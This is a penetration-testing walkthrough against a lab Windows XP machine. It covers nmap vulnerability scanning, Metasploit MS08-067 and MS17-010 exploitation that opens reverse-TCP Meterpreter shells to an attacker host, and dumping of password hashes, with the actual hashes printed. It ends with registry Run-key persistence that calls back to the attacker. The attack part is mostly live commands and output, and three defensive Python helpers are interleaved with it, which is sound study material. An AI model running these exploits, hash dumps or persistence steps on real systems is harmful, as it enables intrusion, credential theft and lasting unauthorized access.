Windows Ms08_067_netapi Metasploit David_Kennedy
Summary on the cover page
msf5 > nmap -A --script=*vuln* 192.168.56.101
[*] exec: nmap -A --script=*vuln* 192.168.56.101

Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-31 14:18 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.0017s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:46:45:AF (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

TRACEROUTE
HOP RTT     ADDRESS
1   1.71 ms 192.168.56.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.18 seconds
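As an added defensive check (not part of the original lab notes), the following Python parses the "Host script results" block of an nmap --script=*vuln* run like the one above and lists which SMB checks came back VULNERABLE, with their CVE IDs and disclosure dates, so a patch backlog can be built straight from the scan. The sample text is a constructed, abridged copy of the output shown above.

```python
import re
# Constructed, abridged excerpt of the "Host script results" block from the scan above.
NMAP_OUTPUT = """\
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|     Disclosure date: 2008-10-23
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Disclosure date: 2017-03-14

TRACEROUTE
"""

# Top-level result line: "| name:" opens a multi-line result, "|_name: value" is a one-liner.
TOP_RE = re.compile(r"^\|[_ ](?P<name>[\w.-]+):\s*(?P<value>.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")

def parse_host_scripts(text):
    """Map each NSE script name to its state, CVE list and disclosure date."""
    results, current = {}, None
    block = text.split("Host script results:", 1)[1].lstrip("\n")
    for line in block.splitlines():
        if not line.startswith("|"):
            break                                   # block ends at the first non-"|" line
        m = TOP_RE.match(line)
        if m:                                       # one-liners keep their literal value as state
            current = m.group("name")
            results[current] = {"state": m.group("value").strip() or None,
                                "cves": [], "disclosure": None}
            continue
        body = line.lstrip("|_ ").strip()           # nested detail line of `current`
        if body.startswith("State:"):
            results[current]["state"] = body.split(":", 1)[1].strip()
        elif body.startswith("IDs:"):
            results[current]["cves"] += CVE_RE.findall(body)
        elif body.startswith("Disclosure date:"):
            results[current]["disclosure"] = body.split(":", 1)[1].strip()
    return results

def vulnerable_checks(text):
    """Names of checks reported VULNERABLE, oldest disclosure first (the patch backlog)."""
    res = parse_host_scripts(text)
    hits = [n for n, r in res.items() if r["state"] == "VULNERABLE"]
    return sorted(hits, key=lambda n: res[n]["disclosure"] or "")
```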
msf5 > search ms08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   1  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption

msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) >

msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.56.101
rhosts => 192.168.56.101
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.56.102
lhost => 192.168.56.102
msf5 exploit(windows/smb/ms08_067_netapi) > set lport 8080

msf5 exploit(windows/smb/ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   ...
   16  Windows XP SP2 Spanish (NX)
   ...
   40  Windows XP SP3 Spanish (NX)
   ...
   59  Windows 2003 SP1 Spanish (NO NX)

msf5 exploit(windows/smb/ms08_067_netapi) > set target 40

msf5 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.56.101   yes       The target address range or CIDR identifier
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.56.102   yes       The listen address (an interface may be specified)
   LPORT     8080             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   40  Windows XP SP3 Spanish (NX)

msf5 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.168.56.102:8080
[*] 192.168.56.101:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.102:8080 -> 192.168.56.101:1035) at 2019-07-31 05:40:39 -0400

meterpreter > sysinfo
Computer        : XPENTST
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : es_ES
Domain          : GRUPO_TRABAJO
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
meterpreter > shell
Process 112 created.
Channel 1 created.
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
Another exploit
msf5 exploit(windows/smb/ms17_010_eternalblue) > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   1  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   2  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   3  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   4  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   5  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

msf5 > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.56.101
rhosts => 192.168.56.101
msf5 exploit(windows/smb/ms17_010_psexec) > set lhost 192.168.56.102
lhost => 192.168.56.102

msf5 exploit(windows/smb/ms17_010_psexec) > show options

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   DBGTRACE              false                                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                192.168.56.101                                                  yes       The target address range or CIDR identifier
   RPORT                 445                                                             yes       The Target port
   SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                  no        The service display name
   SERVICE_NAME                                                                          no        The service name
   SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                               no        The password for the specified username
   SMBUser                                                                               no        The username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(windows/smb/ms17_010_psexec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   PowerShell
   2   Native upload
   3   MOF upload

msf5 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 192.168.56.102:8080
[*] 192.168.56.101:445 - Target OS: Windows 5.1
[*] 192.168.56.101:445 - Filling barrel with fish... done
[*] 192.168.56.101:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.56.101:445 -     [*] Preparing dynamite...
[*] 192.168.56.101:445 -         [*] Trying stick 1 (x86)...Boom!
[*] 192.168.56.101:445 -     [+] Successfully Leaked Transaction!
[*] 192.168.56.101:445 -     [+] Successfully caught Fish-in-a-barrel
[*] 192.168.56.101:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.56.101:445 - Reading from CONNECTION struct at: 0x81d8d820
[*] 192.168.56.101:445 - Built a write-what-where primitive...
[+] 192.168.56.101:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.56.101:445 - Selecting native target
[*] 192.168.56.101:445 - Uploading payload... gkMkJcPE.exe
[*] 192.168.56.101:445 - Created \gkMkJcPE.exe...
[+] 192.168.56.101:445 - Service started successfully...
[*] 192.168.56.101:445 - Deleting \gkMkJcPE.exe...
[*] Sending stage (179779 bytes) to 192.168.56.101
[*] Meterpreter session 2 opened (192.168.56.102:8080 -> 192.168.56.101:1034) at 2019-07-31 14:42:27 -0400

meterpreter >
meterpreter > sysinfo
Computer        : XPENTST
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : es_ES
Domain          : GRUPO_TRABAJO
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
meterpreter > shell
Process 112 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
Post-exploitation
Dumping the password hashes.
meterpreter > use priv
[-] The 'priv' extension has already been loaded.
meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 7a4a5e161d9912813d93fc42ab20d2c2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...

Administrador:500:1e99d771a164613acbe7391d7f72f554:37fc36617aeeb1429f6a4cd2e3870540:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Asistente de ayuda:1000:3050ea1e36e45f2beda5426a9ff8502d:db6385a1ad0f46d5330e4cde96bf21bf:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:18b8af32b0f29331ed6fa91acad4ddb8:::
pp:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
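Added audit example, not from the walkthrough: it parses the pwdump-format lines hashdump printed above and flags what an administrator should fix on this host: accounts with a blank password (NT hash of the empty string), accounts whose LM hash is still stored, and the built-in RID 500 Administrator. The two constants are the well-known LM and NT hashes of an empty password; the sample lines are the ones shown above.

```python
# Well-known hash values of an empty password (LM and NT), used as sentinels.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# The pwdump-format lines hashdump returned above (copied from the walkthrough).
HASHDUMP = """\
Administrador:500:1e99d771a164613acbe7391d7f72f554:37fc36617aeeb1429f6a4cd2e3870540:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Asistente de ayuda:1000:3050ea1e36e45f2beda5426a9ff8502d:db6385a1ad0f46d5330e4cde96bf21bf:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:18b8af32b0f29331ed6fa91acad4ddb8:::
pp:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

def parse_pwdump(text):
    """Parse user:rid:lm:nt::: lines; user names may contain spaces but never colons."""
    accounts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) < 4:
            raise ValueError(f"not a pwdump line: {line!r}")
        accounts.append({"user": fields[0], "rid": int(fields[1]),
                         "lm": fields[2].lower(), "nt": fields[3].lower()})
    return accounts

def audit_accounts(accounts):
    """Hardening findings per account name; accounts with nothing to report are omitted."""
    findings = {}
    for a in accounts:
        issues = []
        if a["nt"] == EMPTY_NT:
            issues.append("blank password")
        if a["lm"] != EMPTY_LM:
            # An LM hash is only stored when NoLMHash is off and the password is <= 14 chars.
            issues.append("LM hash stored (enable NoLMHash, rotate password)")
        if a["rid"] == 500:
            issues.append("built-in Administrator (RID 500)")
        if issues:
            findings[a["user"]] = issues
    return findings
```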
Persistence
1) Enable persistence.
meterpreter > run persistence -X -i 50 -p 443 -r 192.168.56.102

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/XPENTST_20190801.0540/XPENTST_20190801.0540.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=443
[*] Persistent agent script is 99660 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\MpnJlXrxiIU.vbs
[*] Executing script C:\WINDOWS\TEMP\MpnJlXrxiIU.vbs
[+] Agent executed with PID 1640
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\iFKcWWwm
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\iFKcWWwm
meterpreter >
2) Start the multi/handler listener.
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lport 443
msf5 exploit(multi/handler) > set lhost 192.168.56.102
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.102:443
3) Wait for the machine to connect back.
[*] Started reverse TCP handler on 192.168.56.102:443
[*] Sending stage (179779 bytes) to 192.168.56.101
[*] Meterpreter session 4 opened (192.168.56.102:443 -> 192.168.56.101:1042) at 2019-08-01 19:14:28 -0400

meterpreter >
Continue working:
meterpreter > sysinfo
Computer        : XPENTST
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : es_ES
Domain          : GRUPO_TRABAJO
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > shell
Process 1256 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\pp>
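The persistence step above leaves two artifacts a defender can hunt for: a script dropped in C:\WINDOWS\TEMP and a randomly named value under HKLM\Software\Microsoft\Windows\CurrentVersion\Run. As an added example that is not part of the walkthrough, this Python triages a list of Run values (the sample list is constructed here; on a live host it would come from reg query on that key) and flags entries that run a script file, use a script host, point into a temp directory, or carry an irregular mixed-case name like the one the script installed.

```python
import re

# Constructed sample of HKLM\Software\Microsoft\Windows\CurrentVersion\Run values.
# The first mirrors the artifact the persistence script reported above; the
# others are benign fillers. On a live host, feed in the output of:
#   reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUES = [
    ("iFKcWWwm", r"C:\WINDOWS\TEMP\MpnJlXrxiIU.vbs"),
    ("ExampleUpdater", r"C:\Program Files\Example\updater.exe /background"),
    ("ctfmon", r"C:\WINDOWS\system32\ctfmon.exe"),
]

SCRIPT_RE = re.compile(r"\.(vbs|vbe|js|jse|wsf|bat|cmd|ps1|hta)\b")
HOST_RE = re.compile(r"\b(wscript|cscript|mshta|powershell|rundll32|regsvr32)\b")
TEMP_DIRS = ("\\windows\\temp\\", "\\temp\\", "\\tmp\\", "\\appdata\\local\\temp\\")

def looks_random(name):
    """Heuristic: many upper/lower case flips inside one token, typical of generated names."""
    letters = [c for c in name if c.isalpha()]
    flips = sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
    return len(name) >= 6 and flips / len(name) >= 0.4

def triage_run_value(name, command):
    """Reasons an autorun entry deserves a look; an empty list means nothing odd."""
    low = command.lower()
    reasons = []
    m = SCRIPT_RE.search(low)
    if m:
        reasons.append(f"runs a script file (.{m.group(1)})")
    if HOST_RE.search(low):
        reasons.append("uses a script host / LOLBin")
    if any(d in low for d in TEMP_DIRS):
        reasons.append("points into a temp directory")
    if looks_random(name):
        reasons.append("irregular mixed-case value name (heuristic)")
    return reasons

def triage_all(values):
    """Only the entries with at least one reason, keyed by value name."""
    flagged = {}
    for name, command in values:
        reasons = triage_run_value(name, command)
        if reasons:
            flagged[name] = reasons
    return flagged
```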